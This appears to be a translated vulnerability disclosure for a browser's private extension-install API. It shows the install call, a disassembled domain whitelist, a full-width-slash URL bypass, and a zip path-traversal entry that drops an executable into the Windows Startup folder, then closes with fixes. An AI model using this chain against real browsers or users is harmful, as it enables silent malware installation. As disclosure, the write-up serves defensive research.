Security Browser Remote Command Execution Vulnerability (malicious software can be implanted when accessing any website)

security Browser Remote Command Execution Vulnerability (malicious software can be implanted when accessing any website)

The test environment is Windows 7 + The latest version is as follows:
 

The Security browser supports two types of extensions:



1. For chrome extensions similar to http: // **. **/ext/xxx. crx, you must confirm the installation process;

2. For private applications similar to http: // **. **/xxx/xx.zip, you do not need to confirm the installation process;



The installation extension is completed through the private api of the browser. The code is:
 

External. appCmd (se6api. sid, 'seappmgr ', 'installappitem',' {"downurl": "http ://**. **. **. **/se6apps/ExtYouxi _**. **. **. ** 2.zip", "appid": "ExtYouxi", "appname": "game", "appver ":"**. **. **. ** 2 "," callbackFunc ":" oninstalled "} ', 'installcallback', function (){});

The second type of extension programs have powerful functions, and files such as exe and dll are often extended. Because of this, the browser imposes restrictions, and the link in the downurl will be downloaded and installed only when the conditions are met.

What are the specific conditions? Let's analyze:

According to the browser directory file command, the extended functions are stored in seappmgr. dll file, put it in IDA, search for InstallAppItem, downurl, safe, http: // and other keywords, and locate the following code:
 

.text:5C004978 ; int _thiscall sub5C004978(LPCWSTR lpszUrl).text:5C004978 sub5C004978 proc near ; CODE XREF: sub5C030882+15Ep.text:5C004978 push ebx.text:5C004979 push esi.text:5C00497A mov esi, ecx.text:5C00497C mov bl, 1.text:5C00497E test esi, esi.text:5C004980 jz short loc5C0049D8.text:5C004982 cmp word ptr [esi], 0.text:5C004986 jz short loc5C0049D8.text:5C004988 mov edx, offset aDlsafecom ; **.**.**.**.text:5C00498D call sub5C0048C7.text:5C004992 test al, al.text:5C004994 jnz short loc5C0049D8.text:5C004996 mov edx, offset aDownsafec ; **.**.**.**.text:5C00499B mov ecx, esi ; lpszUrl.text:5C00499D call sub5C0048C7.text:5C0049A2 test al, al.text:5C0049A4 jnz short loc5C0049D8.text:5C0049A6 mov edx, offset abaokucn ; **.**.**.**.text:5C0049AB mov ecx, esi ; lpszUrl.text:5C0049AD call sub5C0048C7.text:5C0049B2 test al, al.text:5C0049B4 jnz short loc5C0049D8.text:5C0049B6 mov edx, offset aSeupdatesa ; **.**.**.**.text:5C0049BB mov ecx, esi ; lpszUrl.text:5C0049BD call sub5C0048C7.text:5C0049C2 test al, al.text:5C0049C4 jnz short loc5C0049D8.text:5C0049C6 mov edx, offset aSeappupdate36 ; **.**.**.**.text:5C0049CB mov ecx, esi ; lpszUrl.text:5C0049CD call sub5C0048C7.text:5C0049D2 neg al.text:5C0049D4 sbb al, al.text:5C0049D6 and bl, al.text:5C0049D8.text:5C0049D8 loc5C0049D8: ; CODE XREF: sub5C004978+8j.text:5C0049D8 ; sub5C004978+Ej ....text:5C0049D8 pop esi.text:5C0049D9 mov al, bl.text:5C0049DB pop ebx.text:5C0049DC retn.text:5C0049DC sub5C004978 endp

It looks like a white list,
 

**.**.**.** **.**.**.** **.**.**.****.**.**.****.**.**.**

Further analysis: the domain name obtained from downurl is completed through the InternetCrackUrlW function, instead of directly matching the downurl through regular expressions. How can we bypass InternetCrackUrlW? If you can find a URL to jump to these domain names, it is not perfect, but the problem is not a penny.

**. ** The domain name contains a wildcard character. When downurl is written as follows:
 

http://x.x.x.x／.**.**.**.**/ExtYouxi_**.**.**.**2.zip

Miracle, x. x. x. x /. **. **. **. ** Yes **. **. **. ** policy, and the wide byte character/will be recognized as/by the browser, which is perfect.

Download the ExtYouxi **. ** 2.zip file to your server. After testing, the plug-in is installed silently. Then we try to replace ExtYouxi **. ** 2.zip with a malicious file to execute the command.

Repeated tests showed that ExtYouxi _**. **. **. ** when other dll/exe and other executable files are added to the 2.zip file, the plug-in installation cannot be completed. Is signature verification performed on the files in the compressed package? However, when a file with a file name containing ../is put into the compressed package, the plug-in can be smoothly installed, and the file can be smoothly stored in the directory where we can redirect it. You must have thought of what we are going to do.

Yes, we need to put an exe file in the Windows startup directory.

The directory after installing the plug-in is:
 

C: \ Users \ User \ AppData \ Roaming\ apps \ bin \ se \ plug-in name

We put the file named/../Microsoft/Windows/Start Menu/Programs/Startup/funny.exe into the compressed package. After the previous code is used to install the plug-in, the funny.exe file is perfectly stored in the following folder:
 

C: \ Users \ User \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Startup \

Here, our normal process is to find an xss under a privileged domain, and then write malicious code through xss to complete the attack. At first I thought so, I also found an xss, and completed the compilation of the attack code (actually super simple ).

However, when I set se6api. sid to null, the installation code can be successfully executed under a domain name.

I can't imagine it. It's !!!

See:

Link: http: // **. **/v_show/id_xmtq1mde0mdu1mg1_0000.html: haidianwooyun

Solution:

1. The simplest thing is to filter out the slash (/) of the width byte.

2. Privileged APIs can be called only in the privileged domain.